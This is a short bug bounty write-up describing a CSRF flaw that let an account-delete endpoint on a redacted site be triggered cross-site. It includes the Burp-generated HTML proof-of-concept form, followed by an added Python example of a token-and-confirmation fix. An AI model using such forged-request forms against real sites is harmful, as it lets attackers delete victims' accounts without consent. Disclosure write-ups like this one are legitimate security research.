How I found my first valid Bug!

May 7, 2021


In the name of Allah, I begin.

Hi. I am Orin from Bangladesh. I am a medical student. For the last couple of months I have been trying to get at least one of my bugs triaged, but all I have been getting is duplicates. But finally one of my bugs got triaged. Here I’m gonna explain how I exploited it.

Recently I got invited into a private program. Normally I look at every button or feature of a website and poke around a little bit to see how that function works and how I can manipulate it. In there, most of the features used a CSRF token except the delete button, and no confirmation mail was sent to verify it.

So I quickly generated a CSRF payload (using Burp) and tried it on my second account. And BOoM! It got executed. I was successfully able to delete the second account through CSRF. Here is my payload:

<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="https://www.[REDACTED].com/$victim_username/main/send_delete_request" method="POST">
<input type="hidden" name="message" value="Bug&#32;Hunting&#32;Test&#32;1" />
<input type="submit" value="Submit request" />
</form>

It got triaged as medium severity and I got 7 points for it.
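
The server-side fix for this kind of finding, as an added example that is not part of the original post or the program's code: the delete handler requires a session-bound CSRF token and only queues the deletion behind a confirmation email. The handler name, the `csrf_token` field and the `example.test` origin are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)         # per-deployment secret (constructed here)
TRUSTED_ORIGIN = "https://www.example.test"  # placeholder for the site's own origin


def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Token embedded in the real delete form: nonce + HMAC bound to the session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def csrf_token_valid(session_id: str, token: str) -> bool:
    nonce, sep, mac = (token or "").partition(".")
    if not sep:
        return False
    # Constant-time comparison so the check does not leak how much matched.
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def handle_delete_request(session_id: str, headers: dict, form: dict):
    """Hypothetical handler for the delete endpoint; returns (status, reason)."""
    origin = headers.get("Origin")
    # Defense in depth: a form auto-submitted from another site carries its Origin.
    if origin is not None and origin != TRUSTED_ORIGIN:
        return 403, "cross-origin request"
    # The session cookie rides along with a forged form post; the token does not.
    if not csrf_token_valid(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    # Deletion is only queued; it completes after the emailed link is opened.
    return 202, "confirmation email sent"


if __name__ == "__main__":
    token = issue_csrf_token("sess-A")  # constructed session id
    forged = {"message": "Bug Hunting Test 1"}  # the fields a forged form can supply
    print(handle_delete_request("sess-A", {"Origin": "https://other.example"}, forged))
    print(handle_delete_request("sess-A", {"Origin": TRUSTED_ORIGIN},
                                {"message": "bye", "csrf_token": token}))
```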




Hey. It’s me. Orin. I am a medical student but doing Bug Bounty for fun